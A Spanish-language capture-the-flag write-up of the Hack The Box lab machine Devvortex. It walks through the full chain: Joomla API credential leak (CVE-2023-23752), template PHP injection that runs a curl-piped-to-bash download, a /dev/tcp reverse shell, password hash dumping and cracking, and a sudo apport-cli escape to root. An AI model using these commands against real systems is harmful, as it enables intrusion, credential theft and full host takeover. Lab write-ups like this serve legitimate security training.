Devvortex
Devvortex
Devvortex Linux · Easy - Adventure mode
🔭 Reconocimiento:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
┌──(pmartinezr㉿kali)-[~]
└─$ nmap -p- -Pn -sSVC 10.129.229.146
Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-07 13:09 CET
Nmap scan report for 10.129.229.146
Host is up (0.046s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
| 256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_ 256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://devvortex.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 44.01 seconds
🔭 Reconocimiento:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
┌──(pmartinezr㉿kali)-[~]
└─$ wfuzz -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u http://devvortex.htb -H 'Host: FUZZ.devvortex.htb' --hc 301,302
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://devvortex.htb/
Total requests: 114442
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000019: 200 501 L 1581 W 23221 Ch "dev"
Total time: 0
Processed Requests: 114442
Filtered Requests: 114441
Requests/sec.: 0
La web inicinal http://devvortex.htb tiene un contenido estático, por lo que se entiende poco o nada se puede hacer con ella, eso significa que debemos rebuscar ya sea con dirsearch u otra herramienta para encontrar subdirectorios o subdominios interesantes. Descubro un subdominio http://dev.devvortex.htb
CVE: CVE-2023-23752
🔭 Reconocimiento:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
____ _____ _____ __ __ ___ ___ __ _ _
(_ _)( _ )( _ )( \/ )/ __) / __) /__\ ( \( )
.-_)( )(_)( )(_)( ) ( \__ \( (__ /(__)\ ) (
\____) (_____)(_____)(_/\/\_)(___/ \___)(__)(__)(_)\_)
(1337.today)
--=[OWASP JoomScan
+---++---==[Version : 0.0.7
+---++---==[Update Date : [2018/09/23]
+---++---==[Authors : Mohammad Reza Espargham , Ali Razmjoo
--=[Code name : Self Challenge
@OWASP_JoomScan , @rezesp , @Ali_Razmjo0 , @OWASP
Processing http://dev.devvortex.htb ...
[+] FireWall Detector
[++] Firewall not detected
[+] Detecting Joomla Version
[++] Joomla 4.2.6
[+] Core Joomla Vulnerability
[++] Target Joomla core is not vulnerable
[+] Checking apache info/status files
[++] Readable info/status files are not found
[+] admin finder
[++] Admin page : http://dev.devvortex.htb/administrator/
[+] Checking robots.txt existing
[++] robots.txt is found
path : http://dev.devvortex.htb/robots.txt
Interesting path found from robots.txt
http://dev.devvortex.htb/joomla/administrator/
http://dev.devvortex.htb/administrator/
http://dev.devvortex.htb/api/
http://dev.devvortex.htb/bin/
http://dev.devvortex.htb/cache/
http://dev.devvortex.htb/cli/
http://dev.devvortex.htb/components/
http://dev.devvortex.htb/includes/
http://dev.devvortex.htb/installation/
http://dev.devvortex.htb/language/
http://dev.devvortex.htb/layouts/
http://dev.devvortex.htb/libraries/
http://dev.devvortex.htb/logs/
http://dev.devvortex.htb/modules/
http://dev.devvortex.htb/plugins/
http://dev.devvortex.htb/tmp/
Con Joomscan podemos obtener la versión Joomla 4.2.6
💣 Preparación:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
msf auxiliary(scanner/http/joomla_api_improper_access_checks) > exploit
[+] Users JSON saved to /home/pmartinezr/.msf4/loot/20260107152947_default_10.129.229.146_joomla.users_821206.bin
[+] Joomla Users
============
ID Super User Name Username Email Send Email Register Date Last Visit Date Group Names
-- ---------- ---- -------- ----- ---------- ------------- --------------- -----------
649 * lewis lewis lewis@devvortex.htb 1 2023-09-25 16:44:24 2023-10-29 16:18:50 Super Users
650 logan paul logan logan@devvortex.htb 0 2023-09-26 19:15:42 Registered
[+] Config JSON saved to /home/pmartinezr/.msf4/loot/20260107152947_default_10.129.229.146_joomla.config_659001.bin
[+] Joomla Config
=============
Setting Value
------- -----
db encryption 0
db host localhost
db name joomla
db password P4ntherg0t1n5r3c0n##
db prefix sd4fg_
db user lewis
dbtype mysqli
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Con el módulo de Metasploit scanner/http/joomla_api_improper_access_checks obtenemos un usuario lewis y una password P4ntherg0t1n5r3c0n##
👽 Acciones:
Ahora podemos entrar en Dashboard de jooomla con el usuario lewisy la password P4ntherg0t1n5r3c0n##, este es uno de los administradores con lo que tenemos control total practicamente sobre la aplicación Joomla.
Edito el template en concreto error.php, para otros no tenemos permisos de escritura y nos impedirá salvar los ficheros del template.
1
2
3
4
5
system("curl 10.10.14.110:8000/rev.sh|bash");
┌──(pmartinezr㉿kali)-[~/htb/devvortex]
└─$ python -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.129.229.146 - - [07/Jan/2026 19:17:29] "GET /rev.sh HTTP/1.1" 200 -
Itenté la explotación con una revershell basada en este tutorial https://vk9-sec.com/exploitation-reverse-shell-joomla/ Sin embargo algo que parecía más “standard” system(“/bin/bash -c ‘bash -i >& /dev/tcp/10.10.14.166/4444 0>&1′”); no funcionaba y al final opté por realizarlo con curl y recoger una revershell sirviéndola con Python. Introducimos el siguiente código en error.php <?php system("curl 10.10.14.70:8000/rev.sh|bash"); ?> y le damos al botón save.
1
2
3
4
┌──(pmartinezr㉿kali)-[~/htb/devvortex]
└─$ cat rev.sh
#!/bin/bash
sh -i >& /dev/tcp/10.10.14.110/4444 0>&1
El contenido de rev.sh es una simple revershell para Bash.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
┌──(pmartinezr㉿kali)-[~]
└─$ nc -lnvp 4444
listening on [any] 4444 ...
connect to [10.10.14.110] from (UNKNOWN) [10.129.229.146] 45918
sh: 0: can't access tty; job control turned off
$ whoami
www-data
$ script /dev/null -c bash
Script started, file is /dev/null
www-data@devvortex:~/dev.devvortex.htb$ mysql -u lewis -p
mysql -u lewis -p
Enter password: P4ntherg0t1n5r3c0n##
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 552
Server version: 8.0.35-0ubuntu0.20.04.1 (Ubuntu)
Copyright (c) 2000, 2023, Oracle and/or its affiliates.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql> show databases;
mysql> select * from sd4fg_users;
select * from sd4fg_users;
+-----+------------+----------+---------------------+--------------------------------------------------------------+-------+-----------+---------------------+---------------------+------------+---------------------------------------------------------------------------------------------------------------------------------------------------------+---------------+------------+--------+------+--------------+--------------+
| id | name | username | email | password | block | sendEmail | registerDate | lastvisitDate | activation | params | lastResetTime | resetCount | otpKey | otep | requireReset | authProvider |
+-----+------------+----------+---------------------+--------------------------------------------------------------+-------+-----------+---------------------+---------------------+------------+---------------------------------------------------------------------------------------------------------------------------------------------------------+---------------+------------+--------+------+--------------+--------------+
| 649 | lewis | lewis | lewis@devvortex.htb | $2y$10$6V52x.SD8Xc7hNlVwUTrI.ax4BIAYuhVBMVvnYWRceBmy8XdEzm1u | 0 | 1 | 2023-09-25 16:44:24 | 2026-01-07 14:31:19 | 0 | | NULL | 0 | | | 0 | |
| 650 | logan paul | logan | logan@devvortex.htb | $2y$10$IT4k5kmSGvHSO9d6M/1w0eYiB5Ne9XzArQRFJTGThNiy/yBtkIj12 | 0 | 0 | 2023-09-26 19:15:42 | NULL | | {"admin_style":"","admin_language":"","language":"","editor":"","timezone":"","a11y_mono":"0","a11y_contrast":"0","a11y_highlight":"0","a11y_font":"0"} | NULL | 0 | | | 0 | |
+-----+------------+----------+---------------------+--------------------------------------------------------------+-------+-----------+---------------------+---------------------+------------+---------------------------------------------------------------------------------------------------------------------------------------------------------+---------------+------------+--------+------+--------------+--------------+
2 rows in set (0.00 sec)
Ahora solo hay que visitar la página y recibir la revershell, ya sea con el navegador o con Curl.
Teníamos la password de Mysql así que era buena idea buscar algo en la base de datos.
Con hashcat obtenemos la siguiente password: $2y$10$IT4k5kmSGvHSO9d6M/1w0eYiB5Ne9XzArQRFJTGThNiy/yBtkIj12:tequieromucho
1
2
logan@devvortex:~$ cat user.txt
d2888a2af9c4aa65de8a56ff2ea1f100
Ahora nos conectamos al servicio SSH y obtenemos la primera bandera user.txt
CVE: CVE-2023-1326
🔭 Reconocimiento:
1
2
3
4
5
logan@devvortex:~$ sudo -l
Matching Defaults entries for logan on devvortex:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User logan may run the following commands on devvortex:
(ALL : ALL) /usr/bin/apport-cli
Este CVE nos conduce a la escalada de privilegios basta con buscar un poco de información en Internet sobre apport-cli
👽 Acciones:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
logan@devvortex:~$ sudo /usr/bin/apport-cli -f -P 3333
*** Collecting problem information
The collected information can be sent to the developers to improve the
application. This might take a few minutes.
.......................
*** Send problem report to the developers?
After the problem report has been sent, please fill out the form in the
automatically opened web browser.
What would you like to do? Your options are:
S: Send report (7.3 KB)
V: View report
K: Keep report file for sending later or copying to somewhere else
I: Cancel and ignore future crashes of this program version
C: Cancel
Please choose (S/V/K/I/C): V
:!/bin/bash
root@devvortex:/home/logan# cat /root/root.txt
2df500d64e3398cff51fc24fef4c3548
Durante la ejecución de apport-cli introducimos !/bin/bash en el prompt : y la escalada de privilegios se completa
Esta entrada está licenciada bajo CC BY 4.0 por el autor.